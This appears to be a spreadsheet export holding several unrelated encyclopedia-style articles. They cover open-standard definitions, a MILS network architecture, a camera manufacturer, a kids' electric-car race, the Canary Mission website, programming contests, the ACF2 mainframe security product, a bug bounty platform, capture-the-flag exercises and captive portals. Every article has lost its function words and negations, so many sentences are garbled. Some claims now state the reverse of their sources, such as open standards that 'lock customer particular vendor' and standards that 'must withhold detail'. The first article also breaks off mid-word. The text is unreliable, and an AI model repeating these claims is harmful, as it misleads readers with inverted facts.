indian government definition clear royalty free stance reaching requirements case india's government mandatory characteristics identified standard qualify “open standard”, meets following criteria: 4.1.1 specification document identified standard shall available without nominal fee. 4.1.2 patent claims necessary implement identified standard shall made available royalty-free basis lifetime standard. 4.1.3 identified standard shall adopted maintained not-for-profit organization, wherein stakeholders participate transparent, collaborative consensual manner. 4.1.4 identified standard shall recursively open possible. 4.1.5 identified standard shall technology-neutral specification. 4.1.6 identified standard shall capable localization support, applicable, indian official languages applicable domains. italian definition italy general rule entire public sector dealing open standards, although concentrating data formats, art. code digital administration (codice dell'amministrazione digitale) [applications must] allow representation data different formats, least open data format. [...] defined] open data format, data format made public, thoroughly documented neutral regard technological tools needed peruse data. zealand official interoperability framework definition e-government interoperability framework (e-gif) defines open standard royalty free according following text: while universally agreed definition "open standards" unlikely resolved near future, e-gif accepts definition “open standards” needs recognise continuum ranges closed open, encompasses varying degrees "openness." guide readers respect, e-gif endorses "open standards" exhibit following properties: accessible everyone free charge: discrimination users, payment considerations required condition standard. remain accessible everyone free charge: owners renounce options, any, limit access standard later date. documented details: aspects standard transparent documented, access documentation free.the e-gif performs function e-government road code highways. driving would excessively costly, inefficient, ineffective road rules agreed time vehicle encountered another. spanish definition passed spanish parliament requires electronic services provided spanish public administration must based open standards. defines open standard royalty free, according following definition (anexo definiciones open standard fulfills following conditions: public, available free [gratis] basis, cost imply difficulty user. subject payment intellectual [copyright] industrial [patents trademarks] property right. south african government definition south african government approved definition "minimum interoperability operating standards handbook" (mios).for purposes mios, standard shall considered open meets criteria. there standards obliged adopt pragmatic reasons necessarily fully conform open respects. cases, open standard exist, degree openness taken account selecting appropriate standard: maintained non-commercial organization participation ongoing development work based decision making processes open interested parties. open access: access committee documents, drafts completed standards free cost negligible fee. must possible everyone copy, distribute standard free cost. intellectual rights required implement standard (e.g.essential patent claims) irrevocably available, without royalties attached. there reservations regarding reuse standard. there multiple implementations standard. government definition government's definition open standards applies software interoperability, data document formats. criteria open standards published “open standards principles” policy paper follows. collaboration standard maintained collaborative decision-making process consensus based independent individual supplier. involvement development maintenance standard accessible interested parties. transparency decision-making process transparent, publicly accessible review subject matter experts part process. process standard adopted specification standardisation organisation, forum consortium feedback ratification process ensure quality. fair access standard well documented, publicly available free use. mature completely developed, unless context creating innovative solutions. independent platform, application vendor supported market several implementations. rights rights essential implementation standard, interfacing implementations adopted standard, licensed royalty free basis compatible open source proprietary licensed solutions. these rights irrevocable unless breach licence conditions. cabinet office recommends government departments specify requirements using open standards undertaking procurement exercises order promote interoperability re-use, avoid technological lock-in. venezuelan definition venezuelan government approved "free software open standards law." decree includes requirement venezuelan public sector must free software based open standards, includes definition open standard: article purposes decree, shall understood open standards: technical specifications, published controlled organization charge development, accepted industry, available everybody implementation free software [type software], promoting competitivity, interoperability flexibility. recognized persons bruce perens' definition popular definitions term "open standard", measured google ranking, developed bruce perens. definition lists principles believes must open standard: availability: open standards available read implement. maximize end-user choice: open standards create fair, competitive market implementations standard. they lock customer particular vendor group. royalty: open standards free implement, royalty fee. certification compliance standards organization involve fee. discrimination: open standards organizations administer favor implementor another reason technical standards compliance vendor's implementation. certification organizations must provide path zero-cost implementations validated, also provide enhanced certification services. extension subset: implementations open standards extended, offered subset form. however, certification organizations decline certify subset implementations, place requirements upon extensions (see predatory practices). predatory practices: open standards employ license terms protect subversion standard embrace-and-extend tactics. licenses attached standard require publication reference information extensions, license others create, distribute, sell software compatible extensions. open standard otherwise prohibit extensions.bruce perens goes explain points standard practice. with regard availability, states "any software project able afford copy without undue hardship. cost exceed cost college textbook". krechmer's definition krechmer identifies "rights": open meeting consensus process open world open change open documents open interface open on-going support companies microsoft's definition vijay kapoor, national technology officer, microsoft, defines open standards follows: let's look open standard means: 'open' refers royalty-free, 'standard' means technology approved formalized committees open participation interested parties operate consensus basis. open standard publicly available, developed, approved maintained collaborative consensus driven process. overall, microsoft's relationship open standards was, best, mixed. while microsoft participated significant standard-setting organizations establish open standards, often seen oppositional adoption. non-profit organizations open source initiative's definition open source initiative defines requirements criteria open standards follows:the requirement "open standard" must prohibit conforming implementations open source software. criteria comply open standards requirement, "open standard" must satisfy following criteria. "open standard" meet criteria, discriminating open source developers. intentional secrets: standard must withhold detail necessary interoperable implementation. flaws inevitable, standard must define process fixing flaws identified implementation interoperability testing incorporate said changes revised version superseding version standard released terms violate osr. availability: standard must freely publicly available (e.g., stable site) royalty-free terms reasonable non-discriminatory cost. patents: patents essential implementation standard must: licensed royalty-free terms unrestricted use, covered promise non-assertion practiced open source software agreements: there must requirement execution license agreement, nda, grant, click-through, form paperwork deploy conforming implementations standard. osr-incompatible dependencies: implementation standard must require technology fails meet criteria requirement. world wide consortium's definition provider technology standards, notably xml, http, html, wai, world wide consortium (w3c) follows process promotes development quality standards.looking result, spec alone, adoption, enough. participative/inclusive process leading particular design, supporting resources available accounted talk open standards: transparency (due process public, technical discussions, meeting minutes, archived referencable decision making) relevance (new standardization started upon analysis market needs, including requirements phase, e.g. accessibility, multi-linguism) openness (anybody participate, everybody does: industry, individual, public, government bodies, academia, worldwide scale) impartiality consensus (guaranteed fairness process neutral hosting organization, equal weight participant) availability (free access standard text, development, final stage, translations, assurance core internet technologies implemented royalty-free) maintenance (ongoing process testing, errata, revision, permanent access, validation, etc.) august 2012, combined ietf ieee launch openstand publish modern paradigm standards. this captures "the effective efficient standardization processes made internet premiere platforms innovation borderless commerce". digital standards organization definition digital standards organization (digistan) states open standard must aimed creating unrestricted competition vendors unrestricted choice users." brief definition "open standard" "free open standard") published specification immune vendor capture stages life-cycle." complete definition follows: "the standard adopted maintained not-for-profit organization, ongoing development occurs basis open decision-making procedure available interested parties. standard published standard specification document available freely. must permissible copy, distribute, freely. patents possibly present (parts standard made irrevocably available royalty-free basis. there constraints re-use standard.a defining property open standard immune vendor capture stages life-cycle. immunity vendor capture makes possible improve upon, trust, extend open standard time." this definition based eu's definition "open standard," changes address terms "vendor capture." they believe "many groups individuals provided definitions 'open standard' reflect economic interests standards process. fundamental conflict vendors seek capture markets raise costs, market large, seeks freedom lower costs... vendors work hard turn open standards franchise standards. they work change statutory language cloak franchise standards sheep's clothing 'open standard.' robust definition "free open standard" must thus take account direct economic conflict vendors market large." free software foundation europe's definition free software foundation europe (fsfe) uses definition based european interoperability framework v.1, extended consultation industry community stakeholders. fsfe's standard adopted groups self project, 2008 geneva declaration standards future internet, international document freedom teams. according definition open standard format protocol subject full public assessment without constraints manner equally available parties; without components extensions dependencies formats protocols meet definition open standard themselves; free legal technical clauses limit utilisation party business model; managed developed independently single vendor process open equal participation competitors third parties; available multiple complete implementations competing vendors, complete implementation equally available parties. ffii's definition foundation free information infrastructure's definition said coincide definition issued european interoperability framework released 2004. specification public, standard inclusive developed maintained open standardization process, everybody implement without restriction, neither payment, license (granted everybody free without condition). this minimum license terms asked standardization bodies w3c. course, bodies accept open standards. specification could cost fair amount money (i.e. 100-400 copy copyright publication document itself). comparison definitions examples open standards note various definitions "open standard" differ requirements, standards listed open every definition. system world wide architecture specified hardware extended industry standard architecture (eisa) specification plug-in boards 16-bit ibm-architecture pcs, later standardized ieee) industry standard architecture (isa) retroactively named specification plug-in boards 8-bit ibm-architecture pcs. short-lived eisa, renaming response ibm's move standard bus" proprietary micro channel architecture). peripheral component interconnect (pci) specification intel corporation plug-in boards ibm-architecture pcs) accelerated graphics port (agp) specification intel corporation plug-in boards ibm-architecture pcs) industrial computer manufacturers group (picmg) industry consortium developing open standards specifications computer architectures synchronous dynamic random-access memory (sdram) sdram variants jedec solid state technology association) universal serial (usb) implementers forum) diseqc eutelsat—under "ipr, trademark logo" section recommendation implementation document, stated: diseqc open standard, license required royalty paid rightholder eutelsat. diseqc trademark eutelsat. conditions trademark diseqc obtained eutelsat. file formats computer graphics metafile (cgm) (file format vector graphics, raster graphics, text defined iso/iec 8632) darwin information typing architecture (dita) format architecture create maintain technical documentation defined oasis) hypertext markup language (html), extensible html (xhtml) html5 (specifications structured hyperlinked document formatting) office open specification microsoft document, spreadsheet presentation formats, approved iso/iec 29500) (openness contested container vorbis, flac, speex, opus (audio formats) theora video format), xiph.org foundation) opendocument format (odf) oasis document, spreadsheet, presentation, graphics, math formats, approved iso/iec 26300) opus (audio codec, defined ietf 6716) portable document format (pdf/x) specification adobe systems incorporated formatted documents, later approved 15930-1:2001 portable network graphics (png) bitmapped image format employs lossless data compression, approved iso/iec 15948:2004) scalable vector graphics (svg) specification two-dimensional vector graphics developed world wide consortium (w3c)). protocols connected home (also known "project connected home "chip" short) proprietary, royalty-free home automation connectivity standard project features compatibility among different smart home internet things (iot) products software. internet protocol (ip) specification ietf transmitting packets data network specifically, ietf mqtt (message queuing telemetry transport) lightweight, publish-subscribe network protocol transports messages devices. transmission control protocol (tcp) specification ietf implementing streams data specifically, ietf 793) data synchronization device management platform-independent data synchronization protocol, specified syncml initiative/open mobile alliance) xmpp open protocol near-real-time instant messaging (im) presence information (a.k.a. buddy lists) programming languages ansi general-purpose programming language, approved iso/iec 9899) ada, multi-paradigm programming language, defined joint iso/ansi standard, combined major amendment iso/iec 8652:1995/amd 1:2007 mumps, dynamically typed programming language, originally designed database-driven applications healthcare industry approved iso/iec 11756:1992 iso/iec 11756:1999 other data2dome standard planetarium dome content distribution. apdex (application performance index) (specifies uniform analyze report degree measured performance software applications meets user expectations application response measurement (arm) (defines java programming language measure application transaction response times, adopted open group) cd-rom (yellow book) specification data interchange read-only optical data disks, approved iso/iec 10149 ecma ecma-130) common information model (cim) specification dmtf defining managed elements environment represented common objects relationships them) universal data element framework (udef) open standard open group provides foundation building enterprise-wide controlled vocabulary enabling interoperability. cipurse open standard ospt alliance specifications implement secure element (contactless smart card, sim, embedded secure element)for urban transport network value added services. openreference, open reference model business performance, processes practices, pipeline open data standard (pods) examples associations jedec solid state technology association sets sdram open standard open geospatial consortium develops publishes open standards spatial data services open handset alliance sets open standards mobile device hardware. ospt alliance sets open standard named cipurse access learning association sets educational data interoperability structures. implementers forum sets standards universal serial world wide consortium (w3c) sets open standards internet, protocols, programming languages, etc. patents 2002 2003 controversy using reasonable non-discriminatory (rand) licensing patented technology standards increased. bruce perens, important associations ffii others argued patents restricts implement standard able willing patented technology. requirement small amount user, often insurmountable problem free/open source software implementations redistributed anyone. royalty free (rf) licensing generally possible license free/open source software implementations. version general public license includes section enjoins anyone distributes program released enforcing patents subsequent users software derivative works. result controversy many governments (including danish, french spanish governments singly collectively) specifically affirmed "open standards" required royalty-free licenses. some standards organizations, w3c, modified processes essentially permit royalty-free licensing. patents software, formulas algorithms currently enforceable european patent convention expressly prohibits algorithms, business methods software covered patents. allowed since 1989 growing controversy recent years either benefit feasibility. standards body associated processes cannot force patent holder give right charge license fees, especially company concerned member standards body unconstrained rules standards development process. fact, element discourages standards bodies adopting "open" approach, fearing lose members constrained non-members. bodies carry require members carry out) full patent search. ultimately, sanctions standards body apply non-member patent licensing demanded cancel standard, rework around work invalidate patent. standards bodies oasis require required patents granted royalty-free license condition joining body particular working group, generally considered enforceable.examples patent claims brought standards previously thought open include jpeg rambus case sdram. h.264 video codec example standards organization producing standard known, non-royalty-free required patents. often scope standard determines likely firm able standard patent-like protection. richard langlois argues standards wide scope offer firm level protection competitors likely schumpeterian creative destruction ultimately leave firm open "invented around" regardless standard firm benefit from. quotes commissioner erkki liikanen: "open standards important help create interoperable affordable solutions everybody. they also promote competition setting technical playing field level market players. this means lower costs enterprises and, ultimately, consumer." (world standards day, october 2003) jorma ollila, chairman nokia's board directors: "... open standards platforms create foundation success. they enable interoperability technologies encourage innovativeness healthy competition, turn increases consumer choice opens entirely markets," director berners-lee: "the decision make open system necessary universal. can't propose something universal space time keep control it." opening address southern african telecommunications networks applications conference (satnac) 2005, minister science technology, mosibudi mangena stressed need open standards ict:[...] tsunami devastated south eastern asian countries north-eastern parts africa, perhaps graphic, albeit unfortunate, demonstration need global collaboration, open standards. incalculable loss life damage property exacerbated fact responding agencies non-governmental groups unable share information vital rescue effort. each using different data document formats. relief slowed, coordination complicated. [...] also conformi</t>
  </si>
  <si>
    <t>Partitioning Communication System</t>
  </si>
  <si>
    <t>partitioning communication system computer communications security architecture based information flow separation policy. extends four foundational security policies mils (multiple independent levels security) software architecture network: end-to-end information flow end-to-end data isolation end-to-end periods processing end-to-end damage limitationthe leverages software separation enable application layer entities enforce, manage, control application layer security policies manner application layer security policies are: non-bypassable evaluatable always-invoked tamper-proofthe result communications architecture allows software separation kernel share responsibility security application. invented ois. collaborated extensively requirements with: national security agency force research laboratory university idaho lockheed martin boeing rockwell collins references vanfleet, mark; luke, jahn beckwith, william; taylor, carol; calloni, ben; unchenick, gordon (august 2005). "mils architecture high-assurance embedded computing". crosstalk (aug 2005). archived original 2007-03-19. presentation software based communications workshop beckwith, william. "mils partitioning communication system". objective interface systems, inc. archived original 2007-09-28.</t>
  </si>
  <si>
    <t>Pro-Vision</t>
  </si>
  <si>
    <t>pro-vision american manufacturer specialty cameras headquartered byron center, michigan. company manufactures sells variety cameras including dashcams, body cameras, backup cameras. company appeared inc. 5000 list fastest growing american companies 2011 2017. december 2016, pro-vision products used organizations countries. history pro-vision founded 2003. company initially manufactured items like backup cameras commercial vehicles, later expanded video recording school buses police cruisers.in 2012, pro-vision began manufacturing body cameras police officers. pro-vision trademarked term "bodycam" applies line body-worn cameras. 2014, company began fielding orders police body cameras wake ferguson unrest president barack obama's call increased accountability clarity volatile police situations. numerous police departments throughout united states countries begun using pro-vision body cameras.in 2017, pro-vision made inc. 5000 list seventh consecutive year (2011-2017) fastest-growing private companies america. pro-vision seven manufacturers make list seven consecutive years inc. president editor-in-chief eric schurenberg said, "you remember average company inc. 5000 grew nearly six-fold since 2012." pro-vision also ranked fastest-growing video system manufacturer.in 2019, capital partners, boston-based private equity firm, acquired pro-vision.in june 2020, pro-vision announced leadership changes, appointed michael finn president kevin spalding cfo.in september 2020, pro-vision announced acquired petersburg, florida-based zone defense, manufacturer advanced video systems automotive fleet industries. with location canada, acquisition zone defense offered pro-vision physical footprint outside united states. november 2020, pro-vision partnered kajeet, connectivity, software hardware company, provide video recording cameras school buses.additionally, kajeet's management platform sentinel offers wi-fi access connected school students. 2021, grand rapids business journal announced named pro-vision winner 2020 newsmaker year award technology category. business journal stated 2020 marked "various innovations video systems technology" pro-vision, including release series hybrid bodycam® body-worn camera. products pro-vision initially began manufacturer cameras recording systems could used vehicles. dashcams backup cameras could installed commercial vehicles, school buses, police cars prevent accidents limit liability. these devices continue manufactured pro-vision. recent years, trademarked "bodycam" become notable products. these devices clipped officer's uniform (generally shoulder chest area) capture record video incident public. references</t>
  </si>
  <si>
    <t>Power Racing Series</t>
  </si>
  <si>
    <t>power racing series non-profit power wheels racing competition. it's modeled racing series hours lemons however child sized electric cars. power racing series competitions held maker faire events across usa. about power racing series racing competition teams build $500 power wheel electric kids’ ride vehicle.) modify fast can. history burke launched power racing series. first season 2009 consisted cars, backed pumping station: members. second season 2010 hosted detroit maker faire competitors several hackerspaces throughout country. involvement notable events competitions west mateo, maker faire area kansas city, maker faire kansas citycentral detroit, maker faire detroit milwaukee, maker faire milwaukeeeast pittsburgh, maker faire pittsburgh york, world maker faire yorksouth nashville, nashville mini maker faire atlanta, maker faire atlanta orlando, maker faire orlando references external links official pumping station: website vimby video overview pumping station: power racing series geekprom chicago hackers world unite guardian.co.uk interview eric michaud charcoal foundry build chicago hackerspace hackerspace pumping station will arts open source? innovative technology teamwork results hilarious crashing. magazine</t>
  </si>
  <si>
    <t>Canary Mission</t>
  </si>
  <si>
    <t>canary mission website established 2014 compiles dossiers student activists, professors, organizations, focusing primarily north american universities, considers anti-israel antisemitic said send names listed students prospective employers. canary mission listings used israeli government border security officials interrogate deny entry pro-boycott, divestment sanctions (bds) citizens, potential employers.individuals listed canary said blacklist designed intimidate students, faculty members, community activists engaged palestine solidarity work. some pro-israel activists consider site's tactics overly aggressive, others applaud efforts pro-palestinian activists.the operators website maintained anonymity, justifying secrecy saying "many detractors want know physically harm us." activity according website, canary mission "documents individuals organizations promote hatred israel jews north american college campuses". profiles website constructed using publicly visible information pulled social media sites. profiles often quite detailed included personal information, child photos individuals. website thousands profiles students professors editors believe engaged pro-palestinian anti-israel activism, described blacklist. also includes handful profiles prominent white supremacists. canary mission hosts apology essays written people whose profiles listed site; return, profiles removed website's list. timeline december 2017, canary mission reported alleged antisemitic tweets posted students associated solidarity palestinian human rights (sphr) mcmaster university. tweets written 2011 2017, contained support hitler well calls death israel zionists. sphr response said "condemns forms anti-semitism within organization", referenced comments "intolerable every sense". university actively reviewed "disturbing social media post", publish results review since practice provide details actions taken sanctions applied regard individual students".in april 2018, boycott, divestment sanctions (bds) campaign george washington university, flyers canary mission's logo posted around university denouncing planned student senate vote. vote, adult wearing canary costumes performed dance lobby building vote taking place. september 2018, canary mission released report vote, highlighting reputed antisemitic anti-israel tactics used promote vote.in 2018, canary mission released report social media posts students justice palestine chapter members florida state university, saying social media posts members "endorsements promotion terror well calls intifada violence jews". chapter subsequently released statement writing "entirely condemn denounce racist, anti-black, anti-semitic statements made individuals previous students members chapter," however commenting social media posts "legitimate criticisms israeli governmental policies practices, even though presented anti-semitic." according canary mission, sjp's response condemn social media posts "called intifada violence jews." canary mission listings israeli security services reportedly used content canary mission screen profiled individuals gurion airport. they also reportedly used claims made website justify decisions deport people israel.profiles hosted canary mission harm employment opportunities listed, particularly students untenured faculty, making available statements potential employers readily available online profile. according w.j.t. mitchell, canary mission profile, prospective employers canary mission profiles appear google search results students recent alumni "very deep achievements". structure canary mission publish information runs funds website. although canary mission's website claims nonprofit organization, organization name canary mission registered irs. though canary mission's website provide donate organization debit credit card, public record canary mission's sponsors and/or donors. multiple pro-israel organizations denied affiliation canary mission.according edwin black, extreme antisemitic comments well outright threats violence directed towards canary mission. following threats, canary mission became even cautious avoided disclosing physical location identity. according canary mission's blog, "many detractors want know physically harm us," which, according black, caused canary mission restrict communications journalists. black, says able verify canary mission's location operations, says group students ex-students working medium-sized office american city. funding october 2018, forward haaretz reported canary mission received funding hellen diller family foundation, supporting foundation jewish community federation francisco (jcfsf), organization's operations headed jonathan bash israeli charity named megamot shalom. soon exposure, jcfsf announced would cease funding canary mission. forward also identified jewish community foundation angeles major donor megamot shalom, donated $250,000 2016–2017.the lobby usa, undercover investigation jazeera israel's covert influence campaign united states, reported adam milstein major funding source canary mission. controversy criticism filmmaker rebecca pierce described canary mission using "'mccarthyist tactics' employing 'open racism'." writers monde diplomatique jewish academics compared canary mission's practice extorting apologies targeted individuals exchange amnesty authoritarian regimes mccarthyism united states.the forward reported profiles include content "genuinely troubling", antisemitic social media posts, accusations made website misleading. profile accused student "demonizing israel" student made announcement hillel-sponsored dinner critical donald trump's decision move united states embassy jerusalem. according israeli attorney emily schaeffer omer-man, canary mission's information "often neither reliable, complete, date". said site used israeli border officials meet reliability standards mandated israeli law.pro-palestinian sources denounced canary mission's activities attempt silence critics israel american college campuses intimidation. response, pro-palestinian activists started website called "against canary mission", intend host profiles people targeted canary mission order portray activism positive light.some pro-israel organizations also criticized canary mission aggressive tactics. jewish pro-israeli students said pro-palestinian students faculty suspected colluding canary mission, blaming even involved canary. israel campus coalition endorsed canary mission, writing "through online platforms canary mission, database devoted exposing hatred jews israel, pro-israel community established strong deterrent anti-semitism activism".in february 2018, twitter briefly suspended canary mission's account, exposing 2017 tweet pro-palestinian activist "modified adele's lyrics "set fire jews". according twitter, made error blocking canary. october 2019, hanania commented canary mission:"imagine outrage would expressed website maintained public list jews, publishing photos personal information simply active supporters israel. well, would imagine exist. imagine website shows photos personal information arab americans support palestinian rights filled vicious accusations "anti-semitic" even "anti-american." references external links canary mission website against canary mission website</t>
  </si>
  <si>
    <t>ACES Coders</t>
  </si>
  <si>
    <t>aces coders algorithmic programming competition lanka organized association computer engineering students (aces) department computer engineering, faculty engineering, university peradeniya. aces coders commenced 2011, training event computer engineering students improve efficiency accuracy participate similar online competitions ieeextreme icpc. with increase popularity organized annual basis today largest coding competitions attracts participants universities higher education institutions country. event usually lasts hours contestants given problems solve using programming problem-solving skills. past winners awards aces coders award cash prizes along certificates winning teams. cash prizes grown size years 2019 event came 150,000 total split teams. predicted 2020 event award cash excess 200,000 lkr. references</t>
  </si>
  <si>
    <t>ACF2</t>
  </si>
  <si>
    <t>acf2 (access control facility commercial, discretionary access control software security system developed (z/os today), (z/vse today) (z/vm today) mainframe operating systems skk, inc. barry schrager, eberhard klemens, scott krueger combined develop acf2 london life insurance london, ontario 1978. added acf2 name cambridge systems (who north american marketing rights product) differentiate prototype, developed schrager klemens university illinois—the prototype name acf. also helped distinguish product ibm's acf/vtam. acf2 developed response ibm's racf product (developed 1976), ibm's answer 1974 share security data management project's requirement whitepaper. acf2's design guided requirements, taking resource-rule oriented approach. unique acf2 concepts "protection default" resource pattern masking.as result competitive tension racf acf2, matured (security access facility) interface (now z/os), allowed security product process operating system ("os"), third-party software application security calls, enabling mainframe secure facets mainframe operations. acf2 sold uccel corporation 1986, turn purchased computer associates international, inc. 1987. broadcom inc. (2019) markets acf2 acf2. references</t>
  </si>
  <si>
    <t>Open Bug Bounty</t>
  </si>
  <si>
    <t>open bounty non-profit bounty platform. responsible disclosure platform allows independent security researchers report similar security vulnerabilities website discover using non-intrusive security testing techniques. researchers choose make details vulnerabilities public days since vulnerability submission communicate website operators. program's expectation operators affected website reward researchers making reports. program unlike commercial bounty programs, open bounty non-profit project require payment either researchers website operators. bounty matter agreement researchers website operators. heise.de identified potential website vehicle blackmailing website operators threat disclosing vulnerabilities bounty paid, reported open bounty prohibits this.open bounty launched private security enthusiasts 2014, february 2017 recorded 100,000 vulnerabilities, 35,000 fixed. grew website xssposed, archive cross-site scripting vulnerabilities.in february 2018, platform 100,000 fixed vulnerabilities using coordinated disclosure program based 29147 guidelines. 2019, platform reported 272,020 fixed vulnerabilities using coordinated disclosure program based 29147 guidelines. references external links official website</t>
  </si>
  <si>
    <t>ACM ICPC Dhaka Site</t>
  </si>
  <si>
    <t>international collegiate programming contest (abbreviated acm-icpc icpc) annual multi-tiered competition among universities world. there eighteen different sites asia host asia regional final dhaka them. each year winner asia regional final dhaka site contest advances acm-icpc world finals. like sites icpc, dhaka site contest also sponsored operated auspices association computing machinery (acm). history icpc dhaka site contest started 1997 initiative professor haque north south university (nsu). first event held november 1997 participation teams institutions. bangladesh university engineering technology buet bengal tigers team became champion moved world final held february 1998 atlanta, georgia, united states. champion buet team suman kumar nath (now microsoft research), rezaul alam chowdhury austin) tarique mesbaul islam (waterloo) occupied 24th position world final among teams tying stanford university. same year, team received wild card host dhaka site regional contest participated world final.north south university hosted event times 1997 1999, 2004 2006, 2008 2011, 2013 2015 bangladesh university engineering technology hosted thrice 2001 2003. east west university hosted event 2007. daffodil international university hosted event 2012. bangladesh university business technology hosted event 2014. past events 1997 champion: bangladesh university engineering technology host: north south university champion's position world final: 24th notes: bangladesh university engineering technology also secured 2nd, place. 1998 champion: bangladesh university engineering technology host: north south university champion's position world final: honorable mention notes: bangladesh university engineering technology also secured place. sharif university tehran kanpur secured 11th place respectively. 1999 champion: chinese university hong kong host: north south university champion's position world final: notes: bangladesh university engineering technology secured 2nd, place. 2000 hosted 2001 champion: bangladesh university engineering technology host: bangladesh university engineering technology champion's position world final: honorable mention notes: bangladesh university engineering technology american international university-bangladesh secured place respectively. 2002 champion: bangladesh university engineering technology host: bangladesh university engineering technology champion's position world final: honorable mention notes: nanyang technological university singapore secured place. 2003 champion: fudan university maximum problem solved: host: bangladesh university engineering technology champion's position world final: 15th notes:bangladesh university engineering technology secured place. dhaka university became 4th. 2004 champion:fudan university maximum problem solved: host:north south university champion's position world final: notes: bangladesh university engineering technology secured place. national university singapore bombay secured place respectively. 2005 champion:fudan university maximum problem solved: host:north south university champion's position world final: 39th notes: dhaka university bangladesh university engineering technology secured place respectively. american international university bangladesh became 4th. multimedia university malaysia received honorable mention. 2006 champion:fudan university host:north south university champion's position world final: 26th notes: bangladesh university engineering technology secured place. american international university bangladesh north south university jointly secured place. 2007 champion: bangladesh university engineering technology host: east west university maximum problem solved: champion's position world final: 31st notes: fudan university east west university secured place respectively. total teams universities competed take pride qualify icpc world final 2008. 2008 champion: fudan university host: north south university maximum problem solved: champion's position world final: 14th notes; bangladesh university engineering technology secured place received wild card participating world finals. total teams competed. 2009 champion: fudan university host: north south university maximum problem solved: champion's position world final: 11th notes; bangladesh university engineering technology secured place dhaka university placed 3rd. total teams participated. 2010 champion: bangladesh university engineering technology host: north south university maximum problem solved: champion's position world final: honorable mention notes: fudan university bangladesh university engineering technology secured place respectively. total teams universities competed spot icpc world final 2011. 2011 champion: bangladesh university engineering technology host: north south university maximum problem solved: champion's position world final: honorable mention 2012 champion: shanghai jiao tong university host: daffodil international university maximum problem solved: champion's position world final: 2013 champion: shahjalal university science technology host: north south university maximum problem solved: champion's position world final: honorable mention 2014 champion: shahjalal university science technology host: bangladesh university business technology maximum problem solved: champion's position world final: 2015 champion: jahangirnagar university host: north south university maximum problem solved: champion's position world final: 2016 champion: bangladesh university engineering technology host: university asia pacific maximum problem solved: champion's position world final: honorable mention 2017 champion: bangladesh university engineering technology host: university asia pacific maximum problem solved: dhaka site local teams world final each year least local team dhaka site takes part world final either regional champion wild card. occasions dhaka site local teams made winning icpc kanpur site regional. 2005, fudan university became champion different sites withdrawn championship dhaka site. result, ranked team, university dhaka supposed wild card direct entry world final bangladesh university engineering technology wild card. summary dhaka site local team results world final illustrated following table: icpc dhaka site hosts host universities 1997 north south university 1998 north south university 1999 north south university 2000 hosted 2001 bangladesh university engineering technology 2002 bangladesh university engineering technology 2003 bangladesh university engineering technology 2004 north south university 2005 north south university 2006 north south university 2007 east west university 2008 north south university 2009 north south university 2010 north south university 2011 north south university 2012 daffodil international university 2013 north south university 2014 bangladesh university business technology 2015 north south university 2016 university asia pacific 2017 university asia pacific 2018 daffodil international university 2019 also list computer science awards references external links</t>
  </si>
  <si>
    <t>Capture the flag (cybersecurity)</t>
  </si>
  <si>
    <t>capture flag (ctf) computer security exercise "flags" secretly hidden purposefully-vulnerable programs websites. competitors steal flags either competitors (attack/defense-style ctfs) organizers (jeopardy-style challenges). several variations exist, including hiding flags hardware devices. competitions exist online in-person, advanced entry-level. game based traditional outdoor sport name. summary security ctfs usually designed serve educational exercise give participants experience securing machine, well conducting reacting sort attacks found real world (i.e., bounty programs professional settings). prominent attack/defense ctfs include con's, often considered "finals" competition circuit held since 1996 largest hacker conference, nyu-csaw (cyber security awareness week), largest student cyber-security contest.classic activities include reverse-engineering, packet sniffing, protocol analysis, system administration, programming, cryptoanalysis, writing exploits, among others. attack/defense style competition, team given machine small network) defend—typically isolated competition network. teams scored success defending assigned machine(s) success attacking team's machines. variation classic flag-stealing "plant" flags opponent's machines. hardware challenges usually involve getting unknown piece hardware figure bypass part security measures, e.g. using debugging ports using side-channel attack. jeopardy-style competitions closer programming competitions: teams directly attack other, rather solve challenges posed organizers. time generally factor scoring competitions, "first blood" bonus points often given first solver. king hill–style challenges, players gain points relative ranking. classically, team gains points. when another team bests current champion (e.g., gaining access shared "target" machine champion defending), become champions shift defending position others. also wargame (hacking) cyberwarfare preparedness references</t>
  </si>
  <si>
    <t>Captive portal</t>
  </si>
  <si>
    <t>captive portal page accessed browser displayed newly connected users wi-fi wired network granted broader access network resources. captive portals commonly used present landing log-in page require authentication, payment, acceptance end-user license agreement, acceptable policy, survey completion, valid credentials host user agree adhere captive portals used broad range mobile pedestrian broadband services including cable commercially provided wi-fi home hotspots. captive portal also used provide access enterprise residential wired networks, apartment houses, hotel rooms, business centers. captive portal presented client stored either gateway server hosting page. depending feature gateway, websites ports white-listed user would interact captive portal order them. address attached clients also used bypass login process specified devices. uses captive portals primarily used open wireless networks users shown welcome message informing conditions access (allowed ports, liability, etc.). administrators tend users take responsibility actions avoid legal responsibility. whether delegation responsibility legally valid matter debate.often captive portals used marketing commercial communication purposes. access internet open wi-fi prohibited user exchanges personal data filling web-based registration form browser. web-based form either automatically opens browser, appears user opens browser tries visit page. words, user "captive" unable access internet freely user granted access internet "completed" captive portal. this allows provider service display send advertisements users connect wi-fi access point. this type service also sometimes known "social wi-fi", social network account login (such facebook). over past years, social wi-fi captive portals become commonplace various companies offering marketing centered around wi-fi data collection. user find many types content captive portal, frequent allow access internet exchange viewing content performing certain action (often, providing personal data enable commercial contact); thus, marketing captive portal tool lead generation (business contacts potential clients). implementation there implement captive portal. http redirect common method direct world wide traffic server, returns http redirect captive portal. when modern, internet-enabled device first connects network, sends http request detection predefined vendor expects http status code content. device receives http status code, assumes unlimited internet access. captive portal prompts displayed able manipulate first http message return http status code (redirect) captive portal choice. 6585 specifies network authentication required code. icmp redirect client traffic also redirected using icmp redirect layer level. redirect when client requests world wide resource, queried browser. captive portal, firewall make sure server(s) provided network's dhcp used unauthenticated clients (or, alternatively, forward requests unauthenticated clients server). this server return address captive portal page result lookups. order perform redirection captive portal uses hijacking perform action similar man-in-the-middle attack. limit impact poisoning, typically used. limitations security captive portals known incomplete firewall rule sets. tunneling deployments, rule route requests clients internet, provided server fulfill arbitrary requests client. this allows client bypass captive portal access open internet tunneling arbitrary traffic within packets. automatic submission some captive portals configured allow appropriately equipped user agents detect captive portal automatically authenticate. user agents supplemental applications apple's captive portal assistant sometimes transparently bypass display captive portal content wishes service operator long access correct credentials, attempt authenticate incorrect obsolete credentials, resulting unintentional consequences accidental account locking. spoofing captive portal uses addresses track connected devices sometimes circumvented re-using address previously authenticated device. once device authenticated captive portal using valid credentials, gateway adds device's address allowlist; since addresses easily spoofed, device pretend authenticated device bypass captive portal. once addresses connecting computers found authenticated, machine spoof address internet protocol (ip) address authenticated target, allowed route gateway. reason captive portal solutions created extended authentication mechanisms limit risk usurpation. require browser captive portals often require browser; usually first application users start connected 